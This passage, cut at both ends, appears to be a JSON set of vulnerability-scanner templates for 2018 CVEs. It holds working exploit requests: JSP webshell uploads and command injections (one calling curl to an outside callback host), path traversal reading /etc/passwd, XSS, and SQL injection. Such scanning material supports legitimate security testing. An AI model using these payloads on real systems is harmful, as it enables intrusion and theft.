WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7282","info":{"name":"TITool PrintMonitor - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"PrintMonitor\") && contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2018-19877","info":{"name":"Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>confirm(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-16059","info":{"name":"WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/fcgi-bin/wgsetcgi"],"body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["JSmol2WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15517","info":{"name":"D-Link Central WifiManager - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17246","info":{"name":"Kibana - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"An internal server error occurred\""]},{"type":"word","part":"header","words":["kbn-name","kibana"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin 